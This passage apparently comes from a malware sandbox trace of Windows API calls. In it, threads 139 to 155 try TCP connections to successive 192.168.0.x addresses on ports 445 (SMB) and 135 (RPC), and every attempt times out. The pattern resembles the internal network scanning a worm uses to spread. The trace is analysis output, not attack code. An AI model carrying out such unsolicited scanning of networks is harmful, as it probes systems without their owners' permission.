writefds=0xa22fd08, exceptfds=0xa22fe10) returned 0 [0101.400] closesocket (s=0xadc) returned 0 [0101.401] RtlExitUserThread (Status=0x0) Thread: id = 139 os_tid = 0xc18 [0091.185] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073848 [0091.185] free (_Block=0x2073848) [0091.185] inet_addr (cp="192.168.0.174") returned 0xae00a8c0 [0091.185] htons (hostshort=0x1bd) returned 0xbd01 [0091.185] socket (af=2, type=1, protocol=6) returned 0xae8 [0091.185] ioctlsocket (in: s=0xae8, cmd=-2147195266, argp=0xa36ff34 | out: argp=0xa36ff34) returned 0 [0091.185] connect (s=0xae8, name=0xa36ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.174"), namelen=16) returned -1 [0091.187] WSAGetLastError () returned 10035 [0091.188] select (in: nfds=0, readfds=0x0, writefds=0xa36fd08, exceptfds=0xa36fe10, timeout=0xa36ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa36fd08, exceptfds=0xa36fe10) returned 0 [0096.299] closesocket (s=0xae8) returned 0 [0096.299] inet_addr (cp="192.168.0.174") returned 0xae00a8c0 [0096.299] htons (hostshort=0x87) returned 0x8700 [0096.299] socket (af=2, type=1, protocol=6) returned 0xae8 [0096.300] ioctlsocket (in: s=0xae8, cmd=-2147195266, argp=0xa36ff34 | out: argp=0xa36ff34) returned 0 [0096.300] connect (s=0xae8, name=0xa36ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.174"), namelen=16) returned -1 [0096.300] WSAGetLastError () returned 10035 [0096.300] select (in: nfds=0, readfds=0x0, writefds=0xa36fd08, exceptfds=0xa36fe10, timeout=0xa36ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa36fd08, exceptfds=0xa36fe10) returned 0 [0101.398] closesocket (s=0xae8) returned 0 [0101.399] RtlExitUserThread (Status=0x0) Thread: id = 140 os_tid = 0xc1c [0091.188] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073820 [0091.188] free (_Block=0x2073820) [0091.188] inet_addr (cp="192.168.0.173") returned 0xad00a8c0 [0091.188] htons (hostshort=0x1bd) returned 0xbd01 [0091.188] socket (af=2, type=1, protocol=6) returned 0xaf4 [0091.188] ioctlsocket (in: s=0xaf4, cmd=-2147195266, argp=0xa4aff34 | out: argp=0xa4aff34) returned 0 [0091.188] connect (s=0xaf4, name=0xa4aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.173"), namelen=16) returned -1 [0091.189] WSAGetLastError () returned 10035 [0091.189] select (in: nfds=0, readfds=0x0, writefds=0xa4afd08, exceptfds=0xa4afe10, timeout=0xa4aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa4afd08, exceptfds=0xa4afe10) returned 0 [0096.314] closesocket (s=0xaf4) returned 0 [0096.315] inet_addr (cp="192.168.0.173") returned 0xad00a8c0 [0096.315] htons (hostshort=0x87) returned 0x8700 [0096.315] socket (af=2, type=1, protocol=6) returned 0xaf4 [0096.315] ioctlsocket (in: s=0xaf4, cmd=-2147195266, argp=0xa4aff34 | out: argp=0xa4aff34) returned 0 [0096.315] connect (s=0xaf4, name=0xa4aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.173"), namelen=16) returned -1 [0096.316] WSAGetLastError () returned 10035 [0096.316] select (in: nfds=0, readfds=0x0, writefds=0xa4afd08, exceptfds=0xa4afe10, timeout=0xa4aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa4afd08, exceptfds=0xa4afe10) returned 0 [0101.413] closesocket (s=0xaf4) returned 0 [0101.414] RtlExitUserThread (Status=0x0) Thread: id = 141 os_tid = 0xc20 [0091.189] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20737f8 [0091.189] free (_Block=0x20737f8) [0091.190] inet_addr (cp="192.168.0.172") returned 0xac00a8c0 [0091.190] htons (hostshort=0x1bd) returned 0xbd01 [0091.190] socket (af=2, type=1, protocol=6) returned 0xb00 [0091.190] ioctlsocket (in: s=0xb00, cmd=-2147195266, argp=0xa5eff34 | out: argp=0xa5eff34) returned 0 [0091.190] connect (s=0xb00, name=0xa5eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.172"), namelen=16) returned -1 [0091.190] WSAGetLastError () returned 10035 [0091.190] select (in: nfds=0, readfds=0x0, writefds=0xa5efd08, exceptfds=0xa5efe10, timeout=0xa5eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa5efd08, exceptfds=0xa5efe10) returned 0 [0096.313] closesocket (s=0xb00) returned 0 [0096.314] inet_addr (cp="192.168.0.172") returned 0xac00a8c0 [0096.314] htons (hostshort=0x87) returned 0x8700 [0096.314] socket (af=2, type=1, protocol=6) returned 0xb00 [0096.314] ioctlsocket (in: s=0xb00, cmd=-2147195266, argp=0xa5eff34 | out: argp=0xa5eff34) returned 0 [0096.314] connect (s=0xb00, name=0xa5eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.172"), namelen=16) returned -1 [0096.314] WSAGetLastError () returned 10035 [0096.314] select (in: nfds=0, readfds=0x0, writefds=0xa5efd08, exceptfds=0xa5efe10, timeout=0xa5eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa5efd08, exceptfds=0xa5efe10) returned 0 [0101.412] closesocket (s=0xb00) returned 0 [0101.412] RtlExitUserThread (Status=0x0) Thread: id = 142 os_tid = 0xc24 [0091.191] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20737d0 [0091.191] free (_Block=0x20737d0) [0091.191] inet_addr (cp="192.168.0.171") returned 0xab00a8c0 [0091.191] htons (hostshort=0x1bd) returned 0xbd01 [0091.191] socket (af=2, type=1, protocol=6) returned 0xb0c [0091.191] ioctlsocket (in: s=0xb0c, cmd=-2147195266, argp=0xa72ff34 | out: argp=0xa72ff34) returned 0 [0091.191] connect (s=0xb0c, name=0xa72ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.171"), namelen=16) returned -1 [0091.192] WSAGetLastError () returned 10035 [0091.192] select (in: nfds=0, readfds=0x0, writefds=0xa72fd08, exceptfds=0xa72fe10, timeout=0xa72ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa72fd08, exceptfds=0xa72fe10) returned 0 [0096.312] closesocket (s=0xb0c) returned 0 [0096.312] inet_addr (cp="192.168.0.171") returned 0xab00a8c0 [0096.312] htons (hostshort=0x87) returned 0x8700 [0096.312] socket (af=2, type=1, protocol=6) returned 0xb0c [0096.312] ioctlsocket (in: s=0xb0c, cmd=-2147195266, argp=0xa72ff34 | out: argp=0xa72ff34) returned 0 [0096.313] connect (s=0xb0c, name=0xa72ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.171"), namelen=16) returned -1 [0096.313] WSAGetLastError () returned 10035 [0096.313] select (in: nfds=0, readfds=0x0, writefds=0xa72fd08, exceptfds=0xa72fe10, timeout=0xa72ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa72fd08, exceptfds=0xa72fe10) returned 0 [0101.411] closesocket (s=0xb0c) returned 0 [0101.411] RtlExitUserThread (Status=0x0) Thread: id = 143 os_tid = 0xc28 [0091.194] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20737a8 [0091.194] free (_Block=0x20737a8) [0091.194] inet_addr (cp="192.168.0.170") returned 0xaa00a8c0 [0091.194] htons (hostshort=0x1bd) returned 0xbd01 [0091.194] socket (af=2, type=1, protocol=6) returned 0xb18 [0091.220] ioctlsocket (in: s=0xb18, cmd=-2147195266, argp=0xa86ff34 | out: argp=0xa86ff34) returned 0 [0091.228] connect (s=0xb18, name=0xa86ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.170"), namelen=16) returned -1 [0091.229] WSAGetLastError () returned 10035 [0091.229] select (in: nfds=0, readfds=0x0, writefds=0xa86fd08, exceptfds=0xa86fe10, timeout=0xa86ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa86fd08, exceptfds=0xa86fe10) returned 0 [0096.316] closesocket (s=0xb18) returned 0 [0096.317] inet_addr (cp="192.168.0.170") returned 0xaa00a8c0 [0096.317] htons (hostshort=0x87) returned 0x8700 [0096.317] socket (af=2, type=1, protocol=6) returned 0xb18 [0096.317] ioctlsocket (in: s=0xb18, cmd=-2147195266, argp=0xa86ff34 | out: argp=0xa86ff34) returned 0 [0096.317] connect (s=0xb18, name=0xa86ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.170"), namelen=16) returned -1 [0096.317] WSAGetLastError () returned 10035 [0096.317] select (in: nfds=0, readfds=0x0, writefds=0xa86fd08, exceptfds=0xa86fe10, timeout=0xa86ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa86fd08, exceptfds=0xa86fe10) returned 0 [0101.415] closesocket (s=0xb18) returned 0 [0101.415] RtlExitUserThread (Status=0x0) Thread: id = 144 os_tid = 0xc2c [0091.230] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073780 [0091.230] free (_Block=0x2073780) [0091.230] inet_addr (cp="192.168.0.169") returned 0xa900a8c0 [0091.230] htons (hostshort=0x1bd) returned 0xbd01 [0091.230] socket (af=2, type=1, protocol=6) returned 0xb24 [0091.231] ioctlsocket (in: s=0xb24, cmd=-2147195266, argp=0xa9aff34 | out: argp=0xa9aff34) returned 0 [0091.231] connect (s=0xb24, name=0xa9aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.169"), namelen=16) returned -1 [0091.231] WSAGetLastError () returned 10035 [0091.231] select (in: nfds=0, readfds=0x0, writefds=0xa9afd08, exceptfds=0xa9afe10, timeout=0xa9aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa9afd08, exceptfds=0xa9afe10) returned 0 [0096.317] closesocket (s=0xb24) returned 0 [0096.318] inet_addr (cp="192.168.0.169") returned 0xa900a8c0 [0096.318] htons (hostshort=0x87) returned 0x8700 [0096.318] socket (af=2, type=1, protocol=6) returned 0xb24 [0096.318] ioctlsocket (in: s=0xb24, cmd=-2147195266, argp=0xa9aff34 | out: argp=0xa9aff34) returned 0 [0096.318] connect (s=0xb24, name=0xa9aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.169"), namelen=16) returned -1 [0096.319] WSAGetLastError () returned 10035 [0096.319] select (in: nfds=0, readfds=0x0, writefds=0xa9afd08, exceptfds=0xa9afe10, timeout=0xa9aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa9afd08, exceptfds=0xa9afe10) returned 0 [0101.416] closesocket (s=0xb24) returned 0 [0101.417] RtlExitUserThread (Status=0x0) Thread: id = 145 os_tid = 0xc30 [0091.233] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073758 [0091.233] free (_Block=0x2073758) [0091.233] inet_addr (cp="192.168.0.168") returned 0xa800a8c0 [0091.233] htons (hostshort=0x1bd) returned 0xbd01 [0091.233] socket (af=2, type=1, protocol=6) returned 0xb30 [0091.235] ioctlsocket (in: s=0xb30, cmd=-2147195266, argp=0xaaeff34 | out: argp=0xaaeff34) returned 0 [0091.235] connect (s=0xb30, name=0xaaeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.168"), namelen=16) returned -1 [0091.236] WSAGetLastError () returned 10035 [0091.236] select (in: nfds=0, readfds=0x0, writefds=0xaaefd08, exceptfds=0xaaefe10, timeout=0xaaeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xaaefd08, exceptfds=0xaaefe10) returned 0 [0096.334] closesocket (s=0xb30) returned 0 [0096.335] inet_addr (cp="192.168.0.168") returned 0xa800a8c0 [0096.335] htons (hostshort=0x87) returned 0x8700 [0096.335] socket (af=2, type=1, protocol=6) returned 0xb30 [0096.335] ioctlsocket (in: s=0xb30, cmd=-2147195266, argp=0xaaeff34 | out: argp=0xaaeff34) returned 0 [0096.335] connect (s=0xb30, name=0xaaeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.168"), namelen=16) returned -1 [0096.335] WSAGetLastError () returned 10035 [0096.335] select (in: nfds=0, readfds=0x0, writefds=0xaaefd08, exceptfds=0xaaefe10, timeout=0xaaeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xaaefd08, exceptfds=0xaaefe10) returned 0 [0101.419] closesocket (s=0xb30) returned 0 [0101.420] RtlExitUserThread (Status=0x0) Thread: id = 146 os_tid = 0xc34 [0091.236] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073700 [0091.236] free (_Block=0x2073700) [0091.236] inet_addr (cp="192.168.0.167") returned 0xa700a8c0 [0091.236] htons (hostshort=0x1bd) returned 0xbd01 [0091.236] socket (af=2, type=1, protocol=6) returned 0xb3c [0091.237] ioctlsocket (in: s=0xb3c, cmd=-2147195266, argp=0xac2ff34 | out: argp=0xac2ff34) returned 0 [0091.237] connect (s=0xb3c, name=0xac2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.167"), namelen=16) returned -1 [0091.237] WSAGetLastError () returned 10035 [0091.237] select (in: nfds=0, readfds=0x0, writefds=0xac2fd08, exceptfds=0xac2fe10, timeout=0xac2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xac2fd08, exceptfds=0xac2fe10) returned 0 [0096.333] closesocket (s=0xb3c) returned 0 [0096.333] inet_addr (cp="192.168.0.167") returned 0xa700a8c0 [0096.333] htons (hostshort=0x87) returned 0x8700 [0096.333] socket (af=2, type=1, protocol=6) returned 0xb3c [0096.334] ioctlsocket (in: s=0xb3c, cmd=-2147195266, argp=0xac2ff34 | out: argp=0xac2ff34) returned 0 [0096.334] connect (s=0xb3c, name=0xac2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.167"), namelen=16) returned -1 [0096.334] WSAGetLastError () returned 10035 [0096.334] select (in: nfds=0, readfds=0x0, writefds=0xac2fd08, exceptfds=0xac2fe10, timeout=0xac2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xac2fd08, exceptfds=0xac2fe10) returned 0 [0101.420] closesocket (s=0xb3c) returned 0 [0101.421] RtlExitUserThread (Status=0x0) Thread: id = 147 os_tid = 0xc38 [0091.238] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20736d8 [0091.238] free (_Block=0x20736d8) [0091.238] inet_addr (cp="192.168.0.166") returned 0xa600a8c0 [0091.238] htons (hostshort=0x1bd) returned 0xbd01 [0091.238] socket (af=2, type=1, protocol=6) returned 0xb48 [0091.238] ioctlsocket (in: s=0xb48, cmd=-2147195266, argp=0xad6ff34 | out: argp=0xad6ff34) returned 0 [0091.238] connect (s=0xb48, name=0xad6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.166"), namelen=16) returned -1 [0091.238] WSAGetLastError () returned 10035 [0091.238] select (in: nfds=0, readfds=0x0, writefds=0xad6fd08, exceptfds=0xad6fe10, timeout=0xad6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xad6fd08, exceptfds=0xad6fe10) returned 0 [0096.332] closesocket (s=0xb48) returned 0 [0096.332] inet_addr (cp="192.168.0.166") returned 0xa600a8c0 [0096.332] htons (hostshort=0x87) returned 0x8700 [0096.332] socket (af=2, type=1, protocol=6) returned 0xb48 [0096.332] ioctlsocket (in: s=0xb48, cmd=-2147195266, argp=0xad6ff34 | out: argp=0xad6ff34) returned 0 [0096.333] connect (s=0xb48, name=0xad6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.166"), namelen=16) returned -1 [0096.333] WSAGetLastError () returned 10035 [0096.333] select (in: nfds=0, readfds=0x0, writefds=0xad6fd08, exceptfds=0xad6fe10, timeout=0xad6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xad6fd08, exceptfds=0xad6fe10) returned 0 [0101.422] closesocket (s=0xb48) returned 0 [0101.423] RtlExitUserThread (Status=0x0) Thread: id = 148 os_tid = 0xc3c [0091.239] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20736b0 [0091.239] free (_Block=0x20736b0) [0091.239] inet_addr (cp="192.168.0.165") returned 0xa500a8c0 [0091.239] htons (hostshort=0x1bd) returned 0xbd01 [0091.239] socket (af=2, type=1, protocol=6) returned 0xb54 [0091.239] ioctlsocket (in: s=0xb54, cmd=-2147195266, argp=0xaeaff34 | out: argp=0xaeaff34) returned 0 [0091.239] connect (s=0xb54, name=0xaeaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.165"), namelen=16) returned -1 [0091.240] WSAGetLastError () returned 10035 [0091.240] select (in: nfds=0, readfds=0x0, writefds=0xaeafd08, exceptfds=0xaeafe10, timeout=0xaeaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xaeafd08, exceptfds=0xaeafe10) returned 0 [0096.330] closesocket (s=0xb54) returned 0 [0096.331] inet_addr (cp="192.168.0.165") returned 0xa500a8c0 [0096.331] htons (hostshort=0x87) returned 0x8700 [0096.331] socket (af=2, type=1, protocol=6) returned 0xb54 [0096.331] ioctlsocket (in: s=0xb54, cmd=-2147195266, argp=0xaeaff34 | out: argp=0xaeaff34) returned 0 [0096.331] connect (s=0xb54, name=0xaeaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.165"), namelen=16) returned -1 [0096.331] WSAGetLastError () returned 10035 [0096.332] select (in: nfds=0, readfds=0x0, writefds=0xaeafd08, exceptfds=0xaeafe10, timeout=0xaeaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xaeafd08, exceptfds=0xaeafe10) returned 0 [0101.424] closesocket (s=0xb54) returned 0 [0101.424] RtlExitUserThread (Status=0x0) Thread: id = 149 os_tid = 0xc40 [0091.240] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073688 [0091.240] free (_Block=0x2073688) [0091.240] inet_addr (cp="192.168.0.164") returned 0xa400a8c0 [0091.240] htons (hostshort=0x1bd) returned 0xbd01 [0091.240] socket (af=2, type=1, protocol=6) returned 0xb60 [0091.240] ioctlsocket (in: s=0xb60, cmd=-2147195266, argp=0xafeff34 | out: argp=0xafeff34) returned 0 [0091.241] connect (s=0xb60, name=0xafeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.164"), namelen=16) returned -1 [0091.241] WSAGetLastError () returned 10035 [0091.241] select (in: nfds=0, readfds=0x0, writefds=0xafefd08, exceptfds=0xafefe10, timeout=0xafeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xafefd08, exceptfds=0xafefe10) returned 0 [0096.329] closesocket (s=0xb60) returned 0 [0096.330] inet_addr (cp="192.168.0.164") returned 0xa400a8c0 [0096.330] htons (hostshort=0x87) returned 0x8700 [0096.330] socket (af=2, type=1, protocol=6) returned 0xb60 [0096.330] ioctlsocket (in: s=0xb60, cmd=-2147195266, argp=0xafeff34 | out: argp=0xafeff34) returned 0 [0096.330] connect (s=0xb60, name=0xafeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.164"), namelen=16) returned -1 [0096.330] WSAGetLastError () returned 10035 [0096.330] select (in: nfds=0, readfds=0x0, writefds=0xafefd08, exceptfds=0xafefe10, timeout=0xafeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xafefd08, exceptfds=0xafefe10) returned 0 [0101.425] closesocket (s=0xb60) returned 0 [0101.426] RtlExitUserThread (Status=0x0) Thread: id = 150 os_tid = 0xc44 [0091.241] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073660 [0091.241] free (_Block=0x2073660) [0091.242] inet_addr (cp="192.168.0.163") returned 0xa300a8c0 [0091.242] htons (hostshort=0x1bd) returned 0xbd01 [0091.242] socket (af=2, type=1, protocol=6) returned 0xb6c [0091.242] ioctlsocket (in: s=0xb6c, cmd=-2147195266, argp=0xb12ff34 | out: argp=0xb12ff34) returned 0 [0091.242] connect (s=0xb6c, name=0xb12ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.163"), namelen=16) returned -1 [0091.242] WSAGetLastError () returned 10035 [0091.242] select (in: nfds=0, readfds=0x0, writefds=0xb12fd08, exceptfds=0xb12fe10, timeout=0xb12ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb12fd08, exceptfds=0xb12fe10) returned 0 [0096.328] closesocket (s=0xb6c) returned 0 [0096.328] inet_addr (cp="192.168.0.163") returned 0xa300a8c0 [0096.328] htons (hostshort=0x87) returned 0x8700 [0096.328] socket (af=2, type=1, protocol=6) returned 0xb6c [0096.328] ioctlsocket (in: s=0xb6c, cmd=-2147195266, argp=0xb12ff34 | out: argp=0xb12ff34) returned 0 [0096.329] connect (s=0xb6c, name=0xb12ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.163"), namelen=16) returned -1 [0096.329] WSAGetLastError () returned 10035 [0096.329] select (in: nfds=0, readfds=0x0, writefds=0xb12fd08, exceptfds=0xb12fe10, timeout=0xb12ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb12fd08, exceptfds=0xb12fe10) returned 0 [0101.427] closesocket (s=0xb6c) returned 0 [0101.427] RtlExitUserThread (Status=0x0) Thread: id = 151 os_tid = 0xc48 [0091.243] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073638 [0091.243] free (_Block=0x2073638) [0091.243] inet_addr (cp="192.168.0.162") returned 0xa200a8c0 [0091.243] htons (hostshort=0x1bd) returned 0xbd01 [0091.243] socket (af=2, type=1, protocol=6) returned 0xb78 [0091.243] ioctlsocket (in: s=0xb78, cmd=-2147195266, argp=0xb26ff34 | out: argp=0xb26ff34) returned 0 [0091.243] connect (s=0xb78, name=0xb26ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.162"), namelen=16) returned -1 [0091.244] WSAGetLastError () returned 10035 [0091.244] select (in: nfds=0, readfds=0x0, writefds=0xb26fd08, exceptfds=0xb26fe10, timeout=0xb26ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb26fd08, exceptfds=0xb26fe10) returned 0 [0096.326] closesocket (s=0xb78) returned 0 [0096.327] inet_addr (cp="192.168.0.162") returned 0xa200a8c0 [0096.327] htons (hostshort=0x87) returned 0x8700 [0096.327] socket (af=2, type=1, protocol=6) returned 0xb78 [0096.327] ioctlsocket (in: s=0xb78, cmd=-2147195266, argp=0xb26ff34 | out: argp=0xb26ff34) returned 0 [0096.327] connect (s=0xb78, name=0xb26ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.162"), namelen=16) returned -1 [0096.327] WSAGetLastError () returned 10035 [0096.327] select (in: nfds=0, readfds=0x0, writefds=0xb26fd08, exceptfds=0xb26fe10, timeout=0xb26ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb26fd08, exceptfds=0xb26fe10) returned 0 [0101.428] closesocket (s=0xb78) returned 0 [0101.429] RtlExitUserThread (Status=0x0) Thread: id = 152 os_tid = 0xc4c [0091.244] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073610 [0091.244] free (_Block=0x2073610) [0091.244] inet_addr (cp="192.168.0.161") returned 0xa100a8c0 [0091.244] htons (hostshort=0x1bd) returned 0xbd01 [0091.244] socket (af=2, type=1, protocol=6) returned 0xb84 [0091.244] ioctlsocket (in: s=0xb84, cmd=-2147195266, argp=0xb3aff34 | out: argp=0xb3aff34) returned 0 [0091.244] connect (s=0xb84, name=0xb3aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.161"), namelen=16) returned -1 [0091.245] WSAGetLastError () returned 10035 [0091.245] select (in: nfds=0, readfds=0x0, writefds=0xb3afd08, exceptfds=0xb3afe10, timeout=0xb3aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb3afd08, exceptfds=0xb3afe10) returned 0 [0096.325] closesocket (s=0xb84) returned 0 [0096.325] inet_addr (cp="192.168.0.161") returned 0xa100a8c0 [0096.325] htons (hostshort=0x87) returned 0x8700 [0096.325] socket (af=2, type=1, protocol=6) returned 0xb84 [0096.326] ioctlsocket (in: s=0xb84, cmd=-2147195266, argp=0xb3aff34 | out: argp=0xb3aff34) returned 0 [0096.326] connect (s=0xb84, name=0xb3aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.161"), namelen=16) returned -1 [0096.326] WSAGetLastError () returned 10035 [0096.326] select (in: nfds=0, readfds=0x0, writefds=0xb3afd08, exceptfds=0xb3afe10, timeout=0xb3aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb3afd08, exceptfds=0xb3afe10) returned 0 [0101.430] closesocket (s=0xb84) returned 0 [0101.431] RtlExitUserThread (Status=0x0) Thread: id = 153 os_tid = 0xc50 [0091.245] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20735e8 [0091.245] free (_Block=0x20735e8) [0091.245] inet_addr (cp="192.168.0.160") returned 0xa000a8c0 [0091.245] htons (hostshort=0x1bd) returned 0xbd01 [0091.245] socket (af=2, type=1, protocol=6) returned 0xb90 [0091.246] ioctlsocket (in: s=0xb90, cmd=-2147195266, argp=0xb4eff34 | out: argp=0xb4eff34) returned 0 [0091.246] connect (s=0xb90, name=0xb4eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.160"), namelen=16) returned -1 [0091.246] WSAGetLastError () returned 10035 [0091.246] select (in: nfds=0, readfds=0x0, writefds=0xb4efd08, exceptfds=0xb4efe10, timeout=0xb4eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb4efd08, exceptfds=0xb4efe10) returned 0 [0096.323] closesocket (s=0xb90) returned 0 [0096.324] inet_addr (cp="192.168.0.160") returned 0xa000a8c0 [0096.324] htons (hostshort=0x87) returned 0x8700 [0096.324] socket (af=2, type=1, protocol=6) returned 0xb90 [0096.324] ioctlsocket (in: s=0xb90, cmd=-2147195266, argp=0xb4eff34 | out: argp=0xb4eff34) returned 0 [0096.324] connect (s=0xb90, name=0xb4eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.160"), namelen=16) returned -1 [0096.325] WSAGetLastError () returned 10035 [0096.325] select (in: nfds=0, readfds=0x0, writefds=0xb4efd08, exceptfds=0xb4efe10, timeout=0xb4eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb4efd08, exceptfds=0xb4efe10) returned 0 [0101.432] closesocket (s=0xb90) returned 0 [0101.433] RtlExitUserThread (Status=0x0) Thread: id = 154 os_tid = 0xc54 [0091.246] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20735c0 [0091.246] free (_Block=0x20735c0) [0091.247] inet_addr (cp="192.168.0.159") returned 0x9f00a8c0 [0091.247] htons (hostshort=0x1bd) returned 0xbd01 [0091.247] socket (af=2, type=1, protocol=6) returned 0xb9c [0091.247] ioctlsocket (in: s=0xb9c, cmd=-2147195266, argp=0xb62ff34 | out: argp=0xb62ff34) returned 0 [0091.247] connect (s=0xb9c, name=0xb62ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.159"), namelen=16) returned -1 [0091.247] WSAGetLastError () returned 10035 [0091.247] select (in: nfds=0, readfds=0x0, writefds=0xb62fd08, exceptfds=0xb62fe10, timeout=0xb62ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb62fd08, exceptfds=0xb62fe10) returned 0 [0096.322] closesocket (s=0xb9c) returned 0 [0096.322] inet_addr (cp="192.168.0.159") returned 0x9f00a8c0 [0096.323] htons (hostshort=0x87) returned 0x8700 [0096.323] socket (af=2, type=1, protocol=6) returned 0xb9c [0096.323] ioctlsocket (in: s=0xb9c, cmd=-2147195266, argp=0xb62ff34 | out: argp=0xb62ff34) returned 0 [0096.323] connect (s=0xb9c, name=0xb62ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.159"), namelen=16) returned -1 [0096.323] WSAGetLastError () returned 10035 [0096.323] select (in: nfds=0, readfds=0x0, writefds=0xb62fd08, exceptfds=0xb62fe10, timeout=0xb62ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb62fd08, exceptfds=0xb62fe10) returned 0 [0101.433] closesocket (s=0xb9c) returned 0 [0101.434] RtlExitUserThread (Status=0x0) Thread: id = 155 os_tid = 0xc58 [0091.248] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073598 [0091.248] free (_Block=0x2073598) [0091.248] inet_addr (cp="192.168.0.158") returned 0x9e00a8c0 [0091.248] htons (hostshort=0x1bd) returned 0xbd01 [0091.248] socket (af=2, type=1, protocol=6) returned 0xba8 [0091.248] ioctlsocket (in: s=0xba8, cmd=-2147195266, argp=0xb76ff34 | out: argp=0xb76ff34) returned 0 [0091.248] connect (s=0xba8, name=0xb76ff1c*(sa_family=2, 